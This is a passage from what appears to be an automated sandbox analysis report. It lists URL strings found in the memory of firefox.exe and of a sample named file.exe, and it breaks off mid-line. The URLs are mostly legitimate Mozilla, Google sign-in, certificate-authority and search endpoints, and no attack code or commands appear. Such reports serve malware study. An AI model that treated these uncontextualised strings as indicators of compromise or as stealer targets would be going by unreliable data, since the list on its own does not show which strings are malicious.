Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3163242946.0000016DE0769000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000021.00000003.2897684788.0000016DDE127000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000021.00000003.2897684788.0000016DDE127000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000021.00000003.3218619086.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3199884339.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/r1.crt0
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/wr2.crt0
Source: firefox.exe, 00000021.00000003.3129026786.0000016DEA271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6692000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2972558086.0000016DDCEE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3191939859.0000016DE9AE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3027607728.0000016DDCEC4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2971937157.0000016DDCEFD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2885924546.0000016DDF1D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3144642447.0000016DDE0B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152391838.0000016DDE0B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2974335700.0000016DDCE8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2835528969.0000016DDCED4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3188019102.0000016DE9DCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2981497838.0000016DDCEFD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3035113708.0000016DDA6FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2971937157.0000016DDCE8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2885924546.0000016DDF13D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3184567289.0000016DDC9A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2913893006.0000016DDCEFD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2967575994.0000016DE0495000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3222691378.0000016DDC9A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://o.pki.goog/wr20%
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr10)
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000021.00000003.3156750421.0000016DEA3BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0(
Source: firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0d
Source: firefox.exe, 00000021.00000003.3211240177.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org
Source: firefox.exe, 00000021.00000003.3156750421.0000016DEA3BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3161712087.0000016DE4BCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE67AC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000021.00000003.3203517342.0000016DEA3FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA3FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE662C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org/
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67AC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3161712087.0000016DE4BCC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: file.exe, file.exe, 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000021.00000003.2883300923.0000016DDF269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2880752425.0000016DDF4D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2863559755.0000016DDF4D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970407421.0000016DDF242000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2887374046.0000016DDF065000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000021.00000003.2883300923.0000016DDF269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970407421.0000016DDF242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP
Source: file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467696614.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://149349728.v2.pressablecdn.com/wp-content/uploads/2024/06/nikita-shirokov-0C0scqtrthY-unsplas
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE975F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2814195790.0000016DDD383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000021.00000003.2872801163.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr	String found in binary or memory: https://accounts.google.com
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/1
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr	String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_s
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ServiceLogin
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr	String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/favicon.ico
Source: firefox.exe, 00000021.00000003.3210615866.0000016DEA8F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202170893.0000016DECCE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3218814454.0000016DECCEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/_/AccountsSignInUi/cspreport
Source: firefox.exe, 00000021.00000003.3202170893.0000016DECCE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3218814454.0000016DECCEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/_/AccountsSignInUi/cspreport)
Source: firefox.exe, 00000021.00000003.3202373857.0000016DECCDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210911621.0000016DEA8D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/_/AccountsSignInUi/cspreport/allowlist
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/_/AccountsSignInUi/cspreport;
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3223621375.0000016DEE3D3000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr, WebAssistDatabase.35.dr	String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fa
Source: firefox.exe, 00000021.00000003.2866313930.0000016DDE1FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: firefox.exe, 00000021.00000003.3158429296.0000016DE9EE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE978E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000021.00000003.3164533070.0000016DDEAF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=1.0.0&encp=HF3vIpkY7RcdjpkX4Z8Yfplmfp8kfZ8m7ncqjna
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=1.0.0&encp=HF3vIpkX7RcdjpkX4Z8Yfplmfp8kfZ8m7ncqjnaz7nIZgGeY
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 00000021.00000003.3199884339.0000016DEE272000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202097868.0000016DEE20F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000021.00000003.3176517857.0000016DECDEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 00000021.00000003.3176517857.0000016DECDEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 00000021.00000003.3176517857.0000016DECDEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 00000021.00000003.3176517857.0000016DECDEC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2814195790.0000016DDD383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3161465579.0000016DE4BD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE6781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE6790000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000003.3204782382.0000016DE9E4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE6762000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/boq-infra/identity-boq-js-css-signers
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/AccountsSignInUi
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/boq-infra/identity-boq-js-css-signers
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/youtube_main
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d1n0c1ufntxbvh.cloudfront.net/photo/eabcdc61/98254/1200x/
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/HTTP/Headers/Set-Cookie/SameSite
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE66BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.mozilla.org/?product=firefox-127.0-complete&os=win64&lang=en-US
Source: firefox.exe, 00000021.00000003.3203517342.0000016DEA3FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152391838.0000016DDE0B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3191939859.0000016DE9A8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207334568.0000016DDE0B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2814195790.0000016DDD383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3144642447.0000016DDE0B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3190357375.0000016DDE0B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3167800992.0000016DEA9DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165602215.0000016DEA9EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 